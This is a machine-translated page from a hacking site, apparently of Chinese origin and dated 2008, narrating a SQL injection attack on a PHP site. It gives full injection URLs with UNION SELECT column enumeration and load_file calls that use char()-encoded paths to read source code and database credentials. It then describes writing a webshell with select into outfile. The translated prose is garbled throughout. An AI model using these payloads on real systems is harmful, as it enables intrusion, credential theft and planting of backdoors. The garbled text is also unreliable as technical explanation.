Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker invade > Content
Hot Articles
The MS08-067 crack invad
Smoothwall previews low
The RPC crack invades
GE Interlogix Diamond II
when load_file() invasio
Breaks the IE safe limit
Uses 135 ports to invade
MS08-067 introduces the
The local area network i
Sharp oracle pours into
SonicWALL Customers Prot
SmoothWall Launches Smoo
Invades the WINDOWS serv
Invades RedHat the Linux
Lotus notes also plays t
Recommend Articles
Manual injection ASP scr
Simulates the intruder t
Invades the chinalinux s
The local area network i
Invades the Linux operat
Invades in the process t
Invades once more using
Invades the WINDOWS serv
PHP pours into the invas
Brief analysis Linux sys
Invades the Turkish webs
Invades RedHat the Linux
Buffer overflow analysis
Invades the Linux system
The study contains the c
New Articles
Comodo Disk Encryption n
CRYPTO-MAS-service authe
The criminal attacks Erh
Hackers and malware deve
Five steps to protect co
MI5 hack highlights secu
Kaspersky Mobile Securit
Clavister and Meru Netwo
BioSlimDisk encrypted po
Facebook users are at ri
Europ?organizations awar
Gumblar Web-based attack
2012 Olympic Games suffe
Ties aimed at both Windo
How to recover EFS encry
The Php website's script pours into crack example examination (figure)
  Add date: 10/07/2008   Publishing date: 10/07/2008   Hits: 4
Below we looked php pours into process.

Because is in the network main engine, here only does pours into the test, does not make the further concrete operations. We first add the single quotes character behind the website, the returns error message, proved that this website has the possibility to exist pours into. Submits and again the 1=1 normal demonstration, submits and 1=2 to demonstrate wrongly, good, continues to submit union to pour into the sentence. http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1 similar demonstration error message. But the website way we may know, and is linux system /home/caiqing/www/view_detail.php, continues to submit
http://www.xxx.net/view_datail.php?id=357 and 1=1 union select 1,2 until website normal demonstration when 1,2,3,4,5,6,7,8,9,10,11 input http://www.xxx.net/view_datail.php?id=357 and 1=2 union again by now for http://www.xxx.net/view_datail.php?id=357 and 1=1 union select select 1,2,3,4,5,6,7,8,9,10,11:00 presents like the chart to demonstrate:

In the picture presents the digit 3,5,8,9,7 and so on digit, we compared the original homepage to be clear again, might see in front chart's digital 3,5,7 for the character, we might use the load_file sentence to demonstrate in the website the source code, we might attain mysql smoothly the account number and the password.
After then the /home/caiqing/www/view_detail.php transformation is ascii, is: char (47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112, 104,112) uses load_file the way to add in digital 7, as follows:
http://www.xxx.net/view_datail.php?id=357%20and%201=2%20union%20select%201,2,3,4,5,6,load_file(char(47,104,111,109,101,47,99,97,105,113,105,110,103,47,119,119,119,47,118,105,101,119,95,100,101,116,97,105,108,46,112, 104,112)), 8,9,10,11
Like chart:

We saw had config.php possibly is the database configuration files, we used the similar way to demonstrate again this website the database configuration files, obtained mysql finally the account number and the password, above the root jurisdiction, we might use a foundation table which directly said that joined a few words horse, used select * from rose into outfile again “/home/caiqing/www/shelll.php”; Obtains webshell. May also use in data sheet's user table to carry out the select sentence and the manager user name and the password demonstration in url in the digit 3 and in 5, is situated between here only makes the technical analysis, does not explain in detail.

Prev:How does the hacker steal the Internet bar secretly (chart) Next:Teaches you to use the method which the password invades

Comment:

Category: Home > hacker invade
Home